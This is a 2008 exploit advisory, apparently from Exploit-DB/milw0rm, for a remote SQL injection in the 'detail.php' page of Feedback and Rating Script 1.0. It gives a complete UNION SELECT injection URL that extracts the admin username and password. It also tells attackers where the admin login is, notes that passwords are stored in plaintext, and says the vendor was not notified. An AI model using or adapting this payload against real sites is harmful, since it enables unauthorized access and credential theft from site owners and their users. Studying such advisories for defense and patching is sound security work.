Feedback and Rating Script 1.0 - 'detail.php' SQL Injection

EDB-ID:

5614


Author:

t0pP8uZz

Type:

webapps


Platform:

PHP

Date:

2008-05-14


--==+================================================================================+==--
--==+ Feedback and Rating Script 1.0 (detail.php) Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--



Discovered By: t0pP8uZz
Discovered On: 14 MAY 2008
Script Download: http://cmsnx.com/product.demo.php?id=16
DORK: N/A



Vendor Has Not Been Notified!



DESCRIPTION: 

Feedback and Rating Script suffers from a insecure mysql query, this allows the remote attacker to
inject mysql code/querys into the script, the below injection will display admin username and password.




SQL Injection:

http://site.com/detail.php?listingid=-1/**/UNION/**/ALL/**/SELECT/**/1,CONCAT(0x757365726E616D653A20,username,0x70617373776F72643A,password),3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22/**/FROM/**/auto_admin_settings_tb/**/LIMIT 0,1/*



NOTE/TIP: 

admin login is at /admin/
passwords are in plaintext




GREETZ: milw0rm.com, h4ck-y0u.org, CipherCrew !



peace, t0pP8uZz



--==+================================================================================+==--
--==+ Feedback and Rating Script 1.0 (detail.php) Remote SQL Injection Vulnerability +==--
--==+================================================================================+==--

# milw0rm.com [2008-05-14]